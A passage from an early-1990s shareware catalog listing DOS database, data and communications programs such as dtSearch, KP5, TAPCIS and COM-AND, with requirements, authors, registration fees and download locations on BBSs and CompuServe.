PUB_AD.EXE in IBMAPP forum LIB 9 on CompuServe. + Download size: 140k + Description: + Exceptionally easy to use compact Address Database. Totally + menu driven! SEARCHES and PRINTS on seven fields. Prints + Labels, Envelopes, Phone book (sorted by Name or Business), + WordPerfect mail merge file (9 fields), Report, all output can + go to an ASCII file, and it will even dial your phone. Prints + return address on envelopes. Sorts by Name or Zip+4. Unlimited + records, groups. Great for note-book computers or anywhere disk + space is at a premium. Compact but full featured! Supports all + printers. + + Product: Simply Labels + Free form label program with many features. See full + description on page 397. + + Product: SR-Info + High-performance relational database language. See full + description on page 137. + + Product: STAFF-BASE + Flat File DBMS with relations to other DBF's. See full + description on page 138. + + Product: STAFF-DBMS-PRODUCT-FAMILY + DBMS-Productivity Product Family. See full description on + page 138. + + Product: STAFF-KICK + TSR DBMS compatible with dBASE III Plus. See full description + on page 138. + + Product: Zephyr + FoxPro-Compatible DBMS for Non-Programmers. See full + description on page 140. + + Chapter 5, "Database applications" 147 + + + + 5.4 File format translators + + See also: Utilities, File utilities, File conversion (page 38). + + Product: STAFF-BASE + Flat File DBMS with relations to other DBF's. See full + description on page 138. + + Product: STAFF-DBMS-PRODUCT-FAMILY + DBMS-Productivity Product Family. See full description on + page 138. + + Product: STAFF-UTIL + Utilities for the maintenance-update of DBFs. See full + description on page 151. + + + 5.5 Freeform/text database managers + + Product: dtSearch + Needs: IBM PC, DOS 3.2 or better. Hard disk, 384k RAM. + Author: DT Software, Inc. + Registration: $59.00 + Version: 1.1 (08-14-91) + User benefits: Printed manual; technical support by mail or + CompuServe for one year (telephone support is available through + a 900 number). + Look for: availability unknown on BBSs; DTSRCH.EXE in IBMAPP + forum LIB 2 on CompuServe. + Download size: 290k + Description: + A fast, powerful, and easy to use document search and retrieval + program. Search features: indexed and unindexed searches, + boolean logic (AND, OR, NOT), proximity and phrase searches, + and segment searches. Indexing features: up to 15,000 + documents per index, unlimited number of indexes. Other + features: network support, clipboard, application "launch." + + Supports WordPerfect 5.0 and 5.1, WordStar, WordStar 2000, + Word, Word for Windows, RTF, Multimate Advantage II and + Multimate 4. + + Product: FlexBase + Create database, reports, letters, labels. See full + description on page 200. + + Chapter 5, "Database applications" 148 + + + + Product: Information Please + Needs: IBM PC, DOS 2.1 or better. 384k RAM. + Author: TexaSoft, 214-291-2115 + Registration: $49.00 + Version: 2.07 (06-26-91) + User benefits: Printed Manual, new versions at discount, + newsletter. + Look for: IP207.ZIP on BBSs; IP207.ZIP in IBMAPP forum LIB 3 on + CompuServe. + Download size: 270k + Description: + This text storage and retreival program allows you to store and + retreive full-text informaton such as memos, catalogues, + briefs, letters, articles, invoices, manuals, product + descriptions -- be creative! IP also supports PCX graphics so + you can relate a graphic image to a text entry. PC Focus says + "The potential for this program is unlimited ... IP is + simplicity itself." + + + 5.6 Keypunch programs + + Product: KP5 + Needs: IBM PC, DOS 2.0 or better. 350k RAM. + Author: Peter Charpentier + Registration: $85.00 + Version: 5.07 (01-27-92) + User benefits: Printed manual, unlimited CompuServe/mail support, + free upgrading. + Look for: KP5???.ZIP (multiple files) on BBSs; KP5???.EXE in + IBMAPP forum LIB 15 (multiple files) on CompuServe. + Download size: 275k + Description: + Used by professional, 'heads-down' data entry operators to + enter and verify batches of data from survey research + questionnaires and other forms. Supports large (32k) records + and has no limit on file size. Features include: rapid file + setup, simple drop-down menu interface, two-level range + checking, automatic duplication between and within records, + password protection, session logging. + + + 5.7 Database utilities + + Product: PCFDial + Powerful 7k swapping TSR voice autodialer. See full + description on page 84. + + Chapter 5, "Database applications" 149 + + + + Product: SNAP! + Needs: IBM PC, DOS 3.0 or better. + Author: Walter J. Kennamer + Registration: $0.00 + Version: 5.0 (01-10-92) + User benefits: Unknown. + Look for: availability unknown on BBSs; SNP501.ZIP in FOXFORUM + forum LIB 6 on CompuServe. + Download size: 250k + Description: + Prepares extensive technical documentation for FoxPro, dBASE, + and Clipper systems. It formats source code and adds keyword + capitalization, indentation, program headings and much more. + Also prepares a series of reports including: action diagrams; + tree diagram; variable cross reference; data dictionary; index + file summary; report form layouts. It makes old code look new + again! + + + 5.8 Software tools + + See also: Programming, Languages (page 260); Programming, + Software tools (page 275). + + 5.8.1 For multiple programs + + Product: 4Print + Paper saving utility for LaserJets & DeskJets. See full + description on page 52. + + Product: Recap [***] + Needs: IBM PC, DOS 2.0 or better. 412k RAM. + Author: R.K. West Consulting + Registration: $15.00 + Version: 2.3 (01-01-92) + User benefits: Latest version, free mail support, CIS support, + 900-number phone support, upgrade notices. + Look for: RECAP*.ZIP on BBSs; RECA*.ZIP in IBMAPP forum LIB 3 on + CompuServe. + Download size: 1k + Description: + It can be very frustrating to find that some of your database + records have been entered in all caps when you didn't want them + that way, or that some have not been entered in all caps when + you did want them that way! Goes through any dBase-III + compatible database file and make the desired adjustments. This + program can save you from hours of re-entering data. + + 5.8.2 For dBASE + + Product: dLITE + Memory-res dBASE-Compat Desktop File Manager. See full + description on page 140. + + Chapter 5, "Database applications" 150 + + + + Product: KWIKSTAT + Statistical Data Analysis. See full description on page 255. + + Product: PopDBF + Needs: IBM PC, DOS 2.0 or better. 4k RAM if used in "TSR + swapping" mode; 46k otherwise. + Author: Bowen Software, 309-699-0950 + Registration: $35.00 + Version: 4.0 (08-01-91) + User benefits: Printed manual, phone/CompuServe/mail support. + Look for: POPDBF??.ZIP on BBSs (call 414-789-4210 to download it + at no charge); POPDBF.ZIP in IBMAPP forum LIB 3 on CompuServe. + Download size: 130k + Description: + A 4K TSR that provides "Instant Access to X-Base Files". Here + are just a few of its features: + * Easily select ANY database, any drive + * Append, browse, delete, and edit records + * Delete, pack and zap databases + * Lightning fast search of entire record or selected + field(s) + * View structure + * Print structure or records (browse or edit format) to a + printer or file + * View index expressions (.IDX, .NDX, .NTX) + * Network Compatible + * Context sensitive help + + 5.8.2.1 dBASE III specific + + Product: Badge-O-Magic + LaserJet Nametags Using Any dBASE III File. See full + description on page 53. + + Product: dBF-View + Needs: IBM PC, DOS 3.0 or better. 512k RAM. Hard disk + recommended. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $20.00 + Version: 1.0 (06-01-91) + User benefits: Printed Manual, latest version of software, and + phone support. + Look for: availability unknown on BBSs; DBVIEW.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 123k + Description: + This dBASE III file viewer lets you see the database structure + and/or the contents. It is possible to open a DBF file with a + selected Index. Included utilities: + COPIAS A copy program that optimizes diskette usage + FREE Displays the free Disk space + FRAM Displays the amount of free RAM + FL A listing program + SEAREP Search/replaces text in many files + + Chapter 5, "Database applications" 151 + + + + FQ Batch enhancer + FDUMP File Dumper (EBCDIC,HEX,ASCII) + + Product: STAFF-BASE + Flat File DBMS with relations to other DBF's. See full + description on page 138. + + Product: STAFF-DBMS-PRODUCT-FAMILY + DBMS-Productivity Product Family. See full description on + page 138. + + Product: STAFF-DEVELOPER + Free RunTime Licence for Database Engines. See full + description on page 397. + + Product: STAFF-DIAL + Dialing with phone numbers stored in DBF file. See full + description on page 84. + + Product: STAFF-GRAF + Graphics for Data stored in dBASE III format. See full + description on page 304. + + Product: STAFF-KICK + TSR DBMS compatible with dBASE III Plus. See full description + on page 138. + + Product: STAFF-MASK + Custom designed RETRIEVE/EDIT/ADD/DELETE Mask. See full + description on page 139. + + Product: STAFF-REPORT + Relational Report Generator for DBF files. See full + description on page 156. + + Product: STAFF-UTIL + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $39.00 + Version: 2.0 (01-01-91) + User benefits: Printed manual, latest version on disk, phone + support. + Look for: availability unknown on BBSs; STFUTL.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 170k + Special instructions: Product distribution restricted to the + United States. + Description: + Set of utilities for DBF maintenance: DBF file size + optimization; Breaking down DBF files according to record + number, in equal size parts, maximum capacity per file; Backup + & restore of DBF files; File compression & decompression; + Encryption & decryption; Viewing DBF files; File translation to + and from: LOTUS 123, MULTIPLAN, SUPERCALC, dBASE II, DIF, CSV, + + Chapter 5, "Database applications" 152 + + + + ASCII, Wordstar Mailmerge; Updating of the information stored + in a DBF file by using as input another DBF file with a common + structure. + + 5.8.3 For FoxPro/FoxBASE+ + + Product: DB2DOC + Needs: IBM PC, DOS 2.0 or better. FoxPro 1.02 or FoxBASE+ 2.10 + or later. + Author: Carlos Berguido, 707-762-9067 + Registration: $10.00 + Version: 2.0 (06-30-91) + User benefits: Master disk, one year phone support. + Look for: DB2DOC.ZIP on BBSs (call 908-735-2180 to download it at + no charge); DB2DOC.ZIP in FOXFORUM forum LIB 6 on CompuServe. + Download size: 12k + Description: + Inspects all DBF files in the current directory and quickly + generates/updates a FoxBASE+/FoxPro dbf file, "DB2DOC.ddb". + Menus are provided to BROWSE the documentation database to add + application, file, and field descriptions, and record counts. + + Generates file and field descriptions and statistics to screen, + printer, or disk file for any or all dbf files. Source code + included. + + Product: DB2PRG + Needs: IBM PC, DOS 2.0 or better. FoxPro 1.02 or FoxBASE+ 2.10 + or later. + Author: Carlos Berguido, 707-762-9067 + Registration: $10.00 + Version: 2.1 (06-30-91) + User benefits: Master disk, one year phone support. + Look for: DB2PRG.ZIP on BBSs (call 908-735-2180 to download it at + no charge); DB2PRG.ZIP in FOXFORUM forum LIB 6 on CompuServe. + Download size: 8k + Description: + Inspects all DBF files in the current directory and quickly + generates a FoxBASE+/FoxPro program file, "MAKEDBF.prg", + containing the commands needed to create all or any of your DBF + structures. You may add "DO MAKEDBF" to the initialization + process of your application as suggested in the source code. + + Chapter 5, "Database applications" 153 + + + + Product: QQUERY (All Fox versions) + Needs: IBM PC, DOS 2.0 or better. FoxPro (1.02 or 2.0) or + FoxBASE+ 2.10. + Author: Carlos Berguido, 707-762-9067 + Registration: $10.00 + Version: 2.10E (08-01-91) + User benefits: Master disk, source code, and the right to use it + in distributed applications. + Look for: QQUERY.ZIP on BBSs (call 908-735-2180 to download it at + no charge); QQUERY.ZIP in FOXFORUM forum LIB 6 on CompuServe. + Download size: 230k + Description: + Helps users create, store, modify, and replay logical + rd + expressions. When combined with Fox or 3 party report + generators, it makes a simple yet powerful query tool. + + For Fox database application developers, it adds powerful, + reusable, ad hoc record selection to developer designed data + and report formats. Has complete online help. + + Product: QQUERY (FoxBASE+ 2.10 version) + Needs: IBM PC, DOS 2.0 or better. FoxBASE+ 2.10. + Author: Carlos Berguido, 707-762-9067 + Registration: $10.00 + Version: 2.10E (08-01-91) + User benefits: Master disk, source code, and the right to use it + in distributed applications. + Look for: availability unknown on BBSs; QQFBAS.ZIP in FOXFORUM + forum LIB 6 on CompuServe. + Download size: 100k + Description: + Helps users create, store, modify, and replay logical + rd + expressions. When combined with Fox or 3 party report + generators, it makes a simple yet powerful query tool. + + For Fox database application developers, it adds powerful, + reusable, ad hoc record selection to developer designed data + and report formats. Has complete online help. + + Chapter 5, "Database applications" 154 + + + + Product: QQUERY (FoxPro 1.02 version) + Needs: IBM PC, DOS 2.0 or better. FoxPro 1.02. + Author: Carlos Berguido, 707-762-9067 + Registration: $10.00 + Version: 2.10E (08-01-91) + User benefits: Master disk, source code, and the right to use + QQuery in distributed applications. + Look for: availability unknown on BBSs; QQFPR1.ZIP in FOXFORUM + forum LIB 6 on CompuServe. + Download size: 100k + Description: + Helps users create, store, modify, and replay logical + rd + expressions. When combined with Fox or 3 party report + generators, QQuery makes a simple yet powerful query tool. + + For Fox database application developers, it adds powerful, + reusable, ad hoc record selection to developer designed data + and report formats. Has complete online help. + + Product: QQUERY (FoxPro 2.0 version) + Needs: IBM PC, DOS 2.0 or better. FoxPro 2.0. + Author: Carlos Berguido, 707-762-9067 + Registration: $10.00 + Version: 2.10E (08-01-91) + User benefits: Master disk, source code, and the right to use it + in distributed applications. + Look for: availability unknown on BBSs; QQFPR2.ZIP in FOXFORUM + forum LIB 6 on CompuServe. + Download size: 100k + Description: + Helps users create, store, modify, and replay logical + rd + expressions. When combined with Fox or 3 party report + generators, it makes a simple yet powerful query tool. + + For Fox database application developers, QQuery adds powerful, + reusable, ad hoc record selection to developer designed data + and report formats. Has complete online help. + + Chapter 5, "Database applications" 155 + + + + 5.8.4 For other + + Product: Btr Watch + Needs: IBM PC, DOS 3.1 or better. BTRIEVE.EXE or BREQUEST.EXE + and a Btrieve application. + Author: Informative Technologies, 202-675-4528 + Registration: $29.00 + Version: 1.0 (09-15-91) + User benefits: Latest version of Btr Watch / One year of support + / Bonus disk of other software to evaluate / $7 off + subscription to Shareware Magazine. + Look for: PROG. CORNER on BBSs (call 301-596-1180 to download it + at no charge); BWCH10.ZIP in NOVA forum LIB 14 on CompuServe. + Download size: 115k + Description: + This memory resident Btrieve debugger traces the interaction + between your application and Btrieve files. Monitors calls to + Btrieve and makes an entry into a log file every time a Btrieve + file is accessed. The time, date, file name, operation, + duration, and result of each access is recorded. Network- + compatible and can trace file accesses from multiple + workstations. Catches files that have been opened multiple + times without closing them. + + Product: SNAP! + Prepares technical docs for dBASE, FoxPro. See full + description on page 148. + + Product: STAFF-UTIL + Utilities for the maintenance-update of DBFs. See full + description on page 151. + + Product: Workbase [***] + Needs: IBM PC, DOS 2.0 or better. 512k RAM, some knowledge of + Clipper or dBase. + Author: R.K. West Consulting + Registration: $49.00 + Version: 3.24 (01-01-92) + User benefits: Latest version, printed manual, free mail support, + CIS support, 900-number phone support, upgrade notices. + Look for: WORK*.ZIP on BBSs; WORK*.ZIP in IBMPRO forum LIB 7 on + CompuServe. + Download size: 1k + Description: + Clipper developers: this is an interactive environment for over + 90 "dBase language" commands, including some that may be new to + you. Create, append, edit, browse, restore from and save to MEM + files, display memory, display structure, modify structure -- + many other commands for development, troubleshooting and + support. Includes simple PRG interpreter. If your applications + use dBase-compatible files, you'll love this handy utility. + Unlike other "dot prompt" programs, this one works! + + Chapter 5, "Database applications" 156 + + + + 5.9 Other + + Product: Find Area Code (FAC) + 7K TSR ASCII freeform popup areacode database. See full + description on page 159. + + Product: Information Please + Free-Form Database, Text Database. See full description on + page 147. + + Product: JEPRS (Jeepers!) + Needs: IBM PC, DOS 2.0 or better. 384k RAM. + Author: Louis M. Miranda, 214-522-5110 + Registration: $49.95 + Version: 2.54 (10-20-91) + User benefits: Printed manual, master disks, 6 months phone/ + CompuServe/mail support, bonus utilities. + Look for: availability unknown on BBSs; JD25*.EXE in IBMAPP forum + LIB 7 (multiple files) on CompuServe. + Download size: 300k + Description: + A bibliographic database system for writers & scientists. You + can add, edit, list, search, format, import, and export + reference citations. References can have a title, authors, + journal or book name, pages, volume, year, type (journal, book, + or abstract), editor, publisher, & keywords. Produces + WordPerfect 5.0/5.1 and PC-Write 3.0 compatible output files, + including boldface, italics, underlining, super- & sub-scripts. + It also reads your manuscript and generates a bibliography for + you. + + Product: The Pool Manager + Football Pool Organizer/Database (all sports). See full + description on page 340. + + Product: STAFF-REPORT + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $39.00 + Version: 2.0 (01-01-91) + User benefits: Printed manual, latest version on disk, phone + support. + Look for: availability unknown on BBSs; STFREP.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 150k + Special instructions: Product distribution restricted to the + United States. + Description: + Data belonging to a primary and several related secondary DBF + files can be printed into one report. Several printing formats + can be generated, stored and documented for each primary file. + Report generation editor with on screen selection of related + DBF fields. The selection of records to be printed is possible + using a simple filtering or a complex query procedure. Report + + Chapter 5, "Database applications" 157 + + + + can be sent to printer, screen, or to a file on disk. Up to 3 + lines for titles, 3 lines for footer, and 17 lines for the + header. + + Chapter 6, "Data" 158 + + + + + + Chapter 6 + Data + + + 6.1 Words + + Product: WordZ + A Blank Book For YOU To Fill In. See full description on + page 332. + + + 6.2 Mapping data + + Product: VERSAMAP [***] + Draws maps using Micro World Data Bank II. See full + description on page 301. + + Product: WORLD29 + Global Mapping/tracking Geography. See full description on + page 301. + + + 6.3 Marketing data + + 6.3.1 Shareware specific + + Product: CompUser + A Rated Cyclopedia Of The Shareware Arena. See full + description on page 396. + + + 6.4 World facts + + Product: On This Day + "What Happened On This Day in History?" See full description + on page 298. + + Product: Save the Planet + Ozone & greenhouse data, easy word processor. See full + description on page 298. + + Product: STS26 + Space Shuttle Tracker. See full description on page 285. + + + 6.5 Area codes + + Product: ACCU BBS Lister + WWIV On-line program to determine local BBSs. See full + description on page 165. + + Chapter 6, "Data" 159 + + + + Product: dbDIAL(tm) + 7k TSR Database/Dialer. See full description on page 85. + + Product: Find Area Code (FAC) + Needs: IBM PC, DOS 3.0 or better. CGA monitor; 7k RAM as a TSR; + 138k RAM as a non-TSR. + Author: Mountain Data Systems, 303-773-9515 + Registration: $17.95 + Version: 1.61 (11-18-91) + User benefits: Latest version mailed via surface or CIS; no + upgrade fees for future releases; lifetime mail/email support; + beta testing available. + Look for: FAC161.ZIP on BBSs (call 303-673-9470 to download it at + no charge); FAC161.ZIP in IBMCOM forum LIB 2 on CompuServe. + Download size: 115k + Description: + TSR-capable program finds U.S. & foreign telephone area codes. + Search by city, state, country, area code or any text string. + Search your own ASCII file and/or any other external text file + at 800 lines per second on XT. Also has "fuzzy" sound-alike + spelling mode. Runs from DOS command line, or, as 7K TSR. Fully + configurable via DOS environment variable. Onscreen date/time. + Intelligently supports 25/43/50 line text mono/color video + modes, including DESQview, zooming to full screen when + necessary. + + Product: PCFDial + Powerful 7k swapping TSR voice autodialer. See full + description on page 84. + + + 6.6 Software tools + + 6.6.1 For other + + Product: KP5 + Keypunch emulator for IBM PCs. See full description on + page 148. + + Chapter 6, "Data" 160 + + + + 6.7 Other + + Product: KICK + Needs: IBM PC, DOS 2.0 or better. + Author: TexaSoft, 214-291-2115 + Registration: $24.00 + Version: 1.0 (07-01-91) + User benefits: Includes the book 'A Daily Dose of the American + Dream'..' + Look for: KICK.ZIP on BBSs; KICK.ZIP in IBMAPP forum LIB 7 on + CompuServe. + Download size: 40k + Description: + A Kick in the Pants and a Pat on the Back is your own computer + mentor. It displays motivational and inspirational messages on + the screen in a pleasant shadowed box. Messages are displayed + at random. Place program in your Autoexec file for a morning + refresher each time you boot. Program contains over 150 + messages based on the book "A Daily Dose of the American + Dream", A.C. Elliott, published by Saybrook. Everyone needs a + kick in the pants or a pat on the back now and then -- get + yours now! + + Chapter 7, "Communications" 161 + + + + + + Chapter 7 + Communications + + + 7.1 General purpose modem communications + + Product: COM-AND + Needs: IBM PC, DOS 2.0 or better. 384k RAM, modem or serial + port. + Author: CABER Software, 310-439-6104 + Registration: $50.00 + Version: 2.8 (10-19-91) + User benefits: Bonus utilities. + Look for: CA28-*.ZIP (multiple files) on BBSs (call 310-439-7714 + to download it at no charge); CA28-*.ZIP in IBMCOM forum LIB 3 + (multiple files) on CompuServe; CA28-*.ZIP in IBMPC RTC LIB 6 + (multiple files) on GEnie. + Download size: 771k + Description: + A general purpose communications program that may be used by + itself, or with several integrated accessories. Provides + standard comm program functions: dialing directories, macros, + disk log and backscreen, binary and ASCII file transfers, + scripted execution and so on. Included with this version are + scripts providing a file/directory management (FILEMGR), a + learning mode (LEARN), modem/modemless PC to PC file copy + (PC-2-PC) and more. + + Product: EZ-Reader + Needs: IBM PC, DOS 2.0 or better. PKZIP/PKUNZIP; any text + editor. + Author: Thumper Technologies, 918-355-3374 + Registration: $25.00 + Version: 1.33 (09-30-90) + User benefits: Removes openning screen, enables address book, and + user support. + Look for: EZ133.ZIP on BBSs (call 918-355-4409 to download it at + no charge). + Download size: 182k + Description: + A full featured mail manager for PCBoard, WildCat!, Major BBS, + and other bulletin board software that supports the QWK (Qmail) + format. EZ-Reader is compatible with these mail doors: QMail, + MarkMail, RoseMail, KMail, DJMail, RAMail, MjrMail, TomCat!, + and other QWK format doors. Enables you to read and reply to + mail while offline saving you money in long distance charges. + Other features include the ability to save and print multiple + messages, view news, bulletins, and new files. + + Chapter 7, "Communications" 162 + + + + Product: EZ-Reader + Needs: IBM PC, DOS 3.0 or better. Appropriate compression + programs. + Author: Thumper Technologies, 918-355-3374 + Registration: $29.00 + Version: 2.00 (08-02-91) + User benefits: Two hours of free telephone support, quarterly + newsletter, and removal of the opening screen. + Look for: EZ200*.ZIP (multiple files) on BBSs (call 918-355-4409 + to download it at no charge). + Download size: 200k + Description: + A complete mail management system enabling the user to read, + create, copy, print, save, fax, and, edit mail. Support for + QMail, MarkMail, RoseMail, RAMail, QWicKer, DJMail, Jimmer, + CMPMail, KMail, DJMail, MjrMail, TomCat!, XRS, TAPCIS, MCI + Mail, and all QWK format mail doors. Internal editor includes + 120,000 word spelling checker. Optionally supports the Sound + Blaster, AdLib, and other sound cards. + + + 7.2 Service-specific programs + + 7.2.1 For CompuServe + + Product: CatScan + CIS catalog manager, TAPCIS script generator. See full + description on page 169. + + Product: EZ-Reader + Mail manager for BBSes, MCI Mail, Compuserve. See full + description on page 161. + + Product: Recon(tm) + CompuServe message file manager/reply editor. See full + description on page 170. + + Product: TAPCIS + Needs: IBM PC, DOS 3.1 or better. Modem; hard disk or at least + one 720KB floppy drive. + Author: Support Group, Inc., 301-387-4500 + Registration: $79.00 + Version: 5.4 (12-17-91) + User benefits: 90-day money back guarantee, toll free support to + get connected with CompuServe, TAPCIS Forum for online support, + Introductory CompuServe membership with $15 usage credit, + typeset manual in an attractive book-box. + Look for: TAP*.* (multiple files) on BBSs; TAP*.* in TAPCIS forum + LIB 1 (multiple files) on CompuServe. + Download size: 355k + Description: + Designed exclusively for saving time and money on CompuServe, + you can totally automates and greatly simplifies your access to + forums, libraries, and electronic mail. Without TAPCIS + + Chapter 7, "Communications" 163 + + + + accessing the incredible wealth of information on CompuServe + can be difficult, inefficient, and very expensive. TAPCIS + changes all that by letting you do all your reading, typing, + and thinking offline. Reduces your billable connect time to an + absolute minimum. + + 7.2.2 For GEnie + + Product: EVA + Needs: IBM PC, DOS 3.0 or better. Hard disk; CGA monitor; modem. + Author: Gateway Software + Registration: $35.00 + Version: 1.12 (05-01-91) + User benefits: Latest version and technical support. + Look for: EVA112.ZIP on BBSs; EVA112.ZIP in IBMCOM forum LIB 2 + (multiple files) on CompuServe; EVA112A.ZIP in IBM 615;3 RTC + LIB 6 (multiple files) on GEnie. + Download size: 400k + Special instructions: Product distribution restricted to the + United States. + Description: + GEnie Telecom Front End Software with many features: Pull Down + menu, Mouse support, Hypertext Help, Multi-ID, Full and + complete Off-line and On-line Email manager, including: user + friendly editor, Spell Checker, Forward message, Address book, + Mailing List, Archived and Carbon Copy Mail, XMODEM Mail. Chat/ + RTC commands, Index card, and ZMODEM batch download. + + Product: PC Chart (CGA/HGC) + Technical Analysis Charting Program. See full description on + page 215. + + Product: PC-CHART (EGA/VGA) + Technical Analysis Charting Program. See full description on + page 215. + + 7.2.3 For Prodigy + + Product: PRO$TOCK + Downloads stock quotes from Prodigy. See full description on + page 216. + + Chapter 7, "Communications" 164 + + + + Product: PROPLUS + Needs: IBM PC, DOS 3.0 or better. Hard disk. Prodigy software. + Author: Gateway Software + Registration: $35.00 + Version: 1.62 (06-15-91) + User benefits: Registration Code is mailed out; one free disk + upgrade. + Look for: PRO162A.ZIP on BBSs; PRO16A.ZIP in IBMCOM forum LIB 2 + (multiple files) on CompuServe; PRO162A.ZIP in IBM M615;3 RTC + LIB 6 (multiple files) on GEnie. + Download size: 320k + Special instructions: Product distribution restricted to the + United States. + Description: + This software package is compatible with Prodigy software. + Features include: A Start-up Menu from where you can run + Prodigy with different auto logon ID. Easy to install and easy + to use configuration program. Save Graphics screen in PCX + format with offline viewer Digital clock. Compatible with all + the graphics mode of the Prodigy. Type ahead keyboard buffer. + keyboard macros with On-line recorder. PRINT in a file. Email + Manager with editor and spell checker. + + 7.2.4 For MCImail + + Product: See Mail [***] + Needs: IBM PC, DOS 3.0 or better. Modem for MCI Mail, or any DOS + NetBIOS based network, or Novell Netware, for LAN based e-mail. + Author: Gnosis Inc + Registration: $50.00 + Version: 1.3 (03-20-91) + User benefits: Master disks, upgrades through to version 1.5. + Bonus utilities. + Look for: availability unknown on BBSs; SEE-M*.* in PCVENB forum + LIB 11 (multiple files) on CompuServe. + Download size: 500k + Description: + Sophisticated system for LAN &/or MCI Mail (TSR background MCI + Mail, ONLY 25k of RAM!). Tools to manage large volumes of mail. + LAN system supports groups & security + passwords. Integrated + database system with Rolodex(r) style PIM facilities, user + definable with screen designer provided. Create LAN/MCI mail, + full support for all addressing (FAX, X400, EMS, etc), EVEN + paper! Store in cabinet + drawers/folders. Smart print mail + double page & other fancy formats/fonts. Mail compression & + archiving. + + + 7.3 Bulletin board software + + Product: COM-AND + Communications and Accessories. See full description on + page 161. + + Chapter 7, "Communications" 165 + + + + Product: MegaHost + Needs: IBM PC, DOS 3.1 or better. Hayes modem, hard disk (or a + floppy disk and EMS memory). + Author: ASCII Computer Enterprises + Registration: $29.00 + Version: 1.1 (02-15-92) + User benefits: BBS support, free upgrades. + Look for: MHST1_1.ZIP on BBSs (call 209-836-2402 to download it + at no charge); MHST11.ZIP in IBMBBS forum LIB 1 on CompuServe; + MHST11.ZIP in BBS RTC LIB 4 on GEnie. + Download size: 250k + Description: + While being a full featured BBS, strong points include simple + configuration, ease of use, and tight security functions. It + is small enough to be run from a floppy (use EMS for overlay + speed) although a hard disk is recommended. Ringback for voice + lines, and Callback for added security. Features include + Conferences, Chat, Message Base, File Download Areas, Doors, + Questionnaire, ANSI Graphics, Bulletins, File Transfer + Protocols, User Defined Menus, Events, and Advanced DOS Shell. + + 7.3.1 Bulletin board utilities + + Product: ACCU BBS Lister + Needs: IBM PC, DOS 3.0 or better. WWIV BBS software. + Author: Kevin Fischer, 619-487-5461 + Registration: $5.00 + Version: 3.0 (06-18-91) + User benefits: One-time registration; gives you a code that + allows you to put your BBS name in program. + Look for: ACBBSL30.ZIP on BBSs (call 619-566-1745 to download it + at no charge). + Download size: 100k + Description: + An on-line program for WWIV. It allows users to list the BBS + names and number of the systems that are toll-free to them. It + uses the standard BBSLIST.MSG file which is found in the GFILES + directory. It allows the Sysop to edit BBS entries, sort the + BBS listing, remove BBS numbers, find duplicates, etc. The + Sysop creates a city database by entering a city name, the area + codes/prefixes that belong to it, and a list of cities that the + city can call toll-free. + + Product: VMiX 386 + MSDOS MultiTasker MultiUser for 8086 to 486. See full + description on page 62. + + + 7.4 Call logging & analysis software + + See also: Utilities, Desktop utilities, Phone dialers + (page 82). + + Chapter 7, "Communications" 166 + + + + Product: ACCU BBS Lister + WWIV On-line program to determine local BBSs. See full + description on page 165. + + Product: dbDIAL(tm) + 7k TSR Database/Dialer. See full description on page 85. + + Product: Hotnet + Needs: IBM PC, DOS 3.0 or better. + Author: Robichaux and Associates, 504-752-2620 + Registration: $89.00 + Version: 3.04 (02-04-92) + User benefits: Printed manual, master disks, 90 day support. + Look for: availability unknown on BBSs; HN304.ZIP in IBMAPP forum + LIB 7 (multiple files) on CompuServe; HOTNET.ZIP in HOSB RTC + LIB 0 (multiple files) on GEnie. + Download size: 470k + Description: + TSR option, LAN ready, single or multi-user help desk system. + If you run a customer service center, problem desk, trouble + shooting center, or a help desk, then Hotnet will do the job. + Quickly captures call descriptions (a real PLUS when the phone + is ringing off the hook!), fast search locates call records -- + recycle your solutions. Let management choose from the pre- + defined reports, or add your own custom reports. + + Product: LOGGIT + Needs: IBM PC, DOS 3.0 or better. Telix Comm program. + Author: GTX Software, 213-257-2704 + Registration: $12.00 + Version: 4.00 (01-01-91) + User benefits: Free upgrades for one year. + Look for: LOGGIT.ZIP (multiple files) on BBSs (call 414-789-4352 + to download it at no charge); LOGGIT.ZIP in IBMCOM forum LIB 2 + (multiple files) on CompuServe. + Download size: 40k + Description: + A standalone utility to analyze the log file from the TELIX + communication program. Analyzes the .USE file and produces + several reports showing calls made, total time online, average + time per call and other specific information. Mouse support. + Desqview aware. + + Product: PCFDial + Powerful 7k swapping TSR voice autodialer. See full + description on page 84. + + 7.4.1 Phone bill analyzers + + See also: Business, Business finances, Billing systems + (page 186). + + Chapter 7, "Communications" 167 + + + + Product: Qanalyst + Needs: IBM PC, DOS 2.0 or better. Qmodem v3.0 or better. + Author: Barn Owl Software, 618-632-7345 + Registration: $15.00 + Version: 2.05 (09-19-90) + User benefits: Printed manual; 51/4' disk; 30-day return policy, no + questions asked; one year of voice/fax/CompuServe/newsletter + support. + Look for: QANA-205.ZIP on BBSs; QANLYS.ZIP in IBMCOM forum LIB 2 + on CompuServe; QANA-205.ZIP in QMODEM RTC LIB 1 on GEnie. + Download size: 160k + Description: + Analyzes Qmodem log files so you know how much you SPEND on + modem calls. Great for CompuServe & GEnie users! Keeps track + of holidays when rates go down. Analyzes uploads & downloads + too, including the cost to transfer files. Powerful + maintenance facility keeps Qmodem log files as small as + possible. Uses call Data standard phone-rate files. + + + 7.5 Modem-based graphics applications + + See also: Graphics (page 303). + + Product: MakeDemo + Needs: IBM PC, DOS 2.1 or better. CGA monitor recommended. + Printer with IBM extended graphics character set recommended. + Author: WindhamWoods Publishing, 603.893.2667 + Registration: $49.00 + Version: 3 (06-04-91) + User benefits: Latest version, user's manual, 1-800 telephone + support, notification of updates. + Look for: MDEM3*.ZIP (multiple files) on BBSs (call 414.789.4210 + to download it at no charge); MDEM3*.EXE in IBMAPP forum LIB 7 + (multiple files) on CompuServe. + Download size: 275k + Description: + Create stunning presentations, including your own "Help," with + various sounds and screen overlays as easily as "Mail Merging." + This is to screens what a good word processor is to paragraphs. + Import text or captured screens. Simulate other software or + "prototype" your own. Easily create your own catalogs-on-disk, + computer-aided-instruction, tutorials, or even your own sales + pitch. 250 screens in a single file; 450 screens typical in up + to 100 files, on a 360 kByte disk. Great for BBSs too! + + + 7.6 File format translators + + See also: Utilities, File utilities, File conversion (page 38). + + Product: PCM100.COM + 